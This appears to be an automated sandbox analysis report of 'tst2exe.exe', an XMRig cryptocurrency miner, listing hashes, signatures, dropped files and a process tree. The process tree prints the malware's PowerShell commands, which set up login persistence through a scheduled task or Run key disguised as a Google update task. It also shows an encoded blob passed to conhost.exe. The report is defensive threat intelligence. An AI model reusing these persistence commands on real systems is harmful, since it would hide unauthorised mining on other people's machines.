Overview

overview

10

Static

static

3

tst2exe.exe

windows7-x64

10

tst2exe.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230621-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/07/2023, 08:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    tst2exe.exe

  • Size

    2.0MB

  • MD5

    092d064fa7c8b7c292462d00eb149265

  • SHA1

    0d49c50765b8bf2b4204e879a7be4cc26687f067

  • SHA256

    c295fd06c87d51ea44008eada1aebdf83b796d84110d0c887b30dd1f3f042136

  • SHA512

    4f48809cdc50e36347d9b4d212e9275763a3e35ddd503f3f1e3571a8375fc42340fb39c9049a3d4671944e75f113c4dfc725fc47e549316693065c0a233da93e

  • SSDEEP

    49152:x4PS8H+0oebhaupXOZcifTeCv31EMFvxbcS32paotG:xl8e0oebgE0xEYAHpa0

Score
10/10
xmrigminerupx

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 15 IoCs
    miner
  • Executes dropped EXE 1 IoCs
  • UPX packed file 15 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Suspicious use of SetThreadContext 2 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3300
      • C:\Users\Admin\AppData\Local\Temp\tst2exe.exe
        "C:\Users\Admin\AppData\Local\Temp\tst2exe.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: EnumeratesProcesses
        PID:3424
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lzkcwj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3100
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rjzfniou#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1160
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:2004
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lzkcwj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:5016
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe spvjclcofsaeha
          2⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          PID:872
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3240
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PATH Win32_VideoController GET Name, VideoProcessor
            3⤵
            • Detects videocard installed
            PID:4116
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
          2⤵
            PID:4268
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe ykvqwkwpmylrdfhc 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnasCD7XnRLS04n/3PSQs4Y8p6xe1bGyOY+8Z8xp48QJueDeTETxFigw/gLPZY+zEogUGWJwIe0AnFUo5KGehIuSRD8LakQ2BzY76sQikKRo5YsnCeK/QrMiYGenOchYS4YVm4Mq5GFwkjpX187BgTPg4kGQ/EJj38iB/3as3g5YhZ2bIdgdbaAHvylGhfZzDs8Fdzbj5yoefwc1PUgVtZcrx8AO08U/BUNOX4d1V0IyrQP5B20AcwQFEf3x0sDlsF6RTUzvnwHQcaaeDuk/unYLnfvKkZUjZW8X97DPoFq76llU4OHP3lJptyeI4kahtNiTtYEa0YgdIy3fkqHhgulxBWEv3BRfJvESPAcrtIeoICy32EkyJ0srxUpK9t9omwK3rwfIP/Gc40evP+iApMQO
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:1128
        • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
          C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
          1⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1844

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          3KB

          MD5

          00e7da020005370a518c26d5deb40691

          SHA1

          389b34fdb01997f1de74a5a2be0ff656280c0432

          SHA256

          a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

          SHA512

          9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          ec9eb5e57cc0ad18f4cc68e00a7d8197

          SHA1

          81e07c4f25e1338e930310335227f661ac289a38

          SHA256

          29f7c1224e2047e1bc778047972af5ba51d61b1db3aa92f03d0bfe2282dcd12a

          SHA512

          a1ccd3c8bfd8e944de2d9afc5e0b1641e3e3a0269c13039056937fcda8fb67989d0a970fc4e8999450f9a77224b04ecb838dfdeef86471f412d7b3f4f815b2c4

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          08f9f3eb63ff567d1ee2a25e9bbf18f0

          SHA1

          6bf06056d1bb14c183490caf950e29ac9d73643a

          SHA256

          82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0

          SHA512

          425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bi2wplkd.ecz.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
          Filesize

          2.0MB

          MD5

          092d064fa7c8b7c292462d00eb149265

          SHA1

          0d49c50765b8bf2b4204e879a7be4cc26687f067

          SHA256

          c295fd06c87d51ea44008eada1aebdf83b796d84110d0c887b30dd1f3f042136

          SHA512

          4f48809cdc50e36347d9b4d212e9275763a3e35ddd503f3f1e3571a8375fc42340fb39c9049a3d4671944e75f113c4dfc725fc47e549316693065c0a233da93e

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
          Filesize

          2.0MB

          MD5

          092d064fa7c8b7c292462d00eb149265

          SHA1

          0d49c50765b8bf2b4204e879a7be4cc26687f067

          SHA256

          c295fd06c87d51ea44008eada1aebdf83b796d84110d0c887b30dd1f3f042136

          SHA512

          4f48809cdc50e36347d9b4d212e9275763a3e35ddd503f3f1e3571a8375fc42340fb39c9049a3d4671944e75f113c4dfc725fc47e549316693065c0a233da93e

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Google\Libs\g.log
          Filesize

          226B

          MD5

          fdba80d4081c28c65e32fff246dc46cb

          SHA1

          74f809dedd1fc46a3a63ac9904c80f0b817b3686

          SHA256

          b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

          SHA512

          b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          Download Submit

        • memory/872-186-0x00007FF6B87F0000-0x00007FF6B8806000-memory.dmp

          Filesize

          88KB

          Download

        • memory/872-189-0x00007FF6B87F0000-0x00007FF6B8806000-memory.dmp

          Filesize

          88KB

          Download

        • memory/1128-190-0x00007FF657B20000-0x00007FF658314000-memory.dmp

          Filesize

          8.0MB

          Download

        • memory/1128-210-0x00007FF657B20000-0x00007FF658314000-memory.dmp

          Filesize

          8.0MB

          Download

        • memory/1128-214-0x00007FF657B20000-0x00007FF658314000-memory.dmp

          Filesize

          8.0MB

          Download

        • memory/1128-212-0x00007FF657B20000-0x00007FF658314000-memory.dmp

          Filesize

          8.0MB

          Download

        • memory/1128-208-0x00007FF657B20000-0x00007FF658314000-memory.dmp

          Filesize

          8.0MB

          Download

        • memory/1128-206-0x00007FF657B20000-0x00007FF658314000-memory.dmp

          Filesize

          8.0MB

          Download

        • memory/1128-183-0x000002617F610000-0x000002617F630000-memory.dmp

          Filesize

          128KB

          Download

        • memory/1128-184-0x00007FF657B20000-0x00007FF658314000-memory.dmp

          Filesize

          8.0MB

          Download

        • memory/1128-185-0x0000026211D20000-0x0000026211D60000-memory.dmp

          Filesize

          256KB

          Download

        • memory/1128-204-0x00007FF657B20000-0x00007FF658314000-memory.dmp

          Filesize

          8.0MB

          Download

        • memory/1128-187-0x00007FF657B20000-0x00007FF658314000-memory.dmp

          Filesize

          8.0MB

          Download

        • memory/1128-191-0x00000262121A0000-0x00000262121C0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/1128-202-0x00007FF657B20000-0x00007FF658314000-memory.dmp

          Filesize

          8.0MB

          Download

        • memory/1128-200-0x00007FF657B20000-0x00007FF658314000-memory.dmp

          Filesize

          8.0MB

          Download

        • memory/1128-188-0x00007FF657B20000-0x00007FF658314000-memory.dmp

          Filesize

          8.0MB

          Download

        • memory/1128-193-0x00007FF657B20000-0x00007FF658314000-memory.dmp

          Filesize

          8.0MB

          Download

        • memory/1128-194-0x00000262121A0000-0x00000262121C0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/1128-196-0x00007FF657B20000-0x00007FF658314000-memory.dmp

          Filesize

          8.0MB

          Download

        • memory/1128-198-0x00007FF657B20000-0x00007FF658314000-memory.dmp

          Filesize

          8.0MB

          Download

        • memory/1844-182-0x00007FF7BB860000-0x00007FF7BBA71000-memory.dmp

          Filesize

          2.1MB

          Download

        • memory/3100-145-0x0000026F375D0000-0x0000026F375E0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3100-138-0x0000026F37610000-0x0000026F37632000-memory.dmp

          Filesize

          136KB

          Download

        • memory/3100-143-0x0000026F375D0000-0x0000026F375E0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3100-144-0x0000026F375D0000-0x0000026F375E0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3424-149-0x00007FF71C400000-0x00007FF71C611000-memory.dmp

          Filesize

          2.1MB

          Download

        • memory/5016-173-0x0000017E02E40000-0x0000017E02E50000-memory.dmp

          Filesize

          64KB

          Download

        • memory/5016-174-0x0000017E02E40000-0x0000017E02E50000-memory.dmp

          Filesize

          64KB

          Download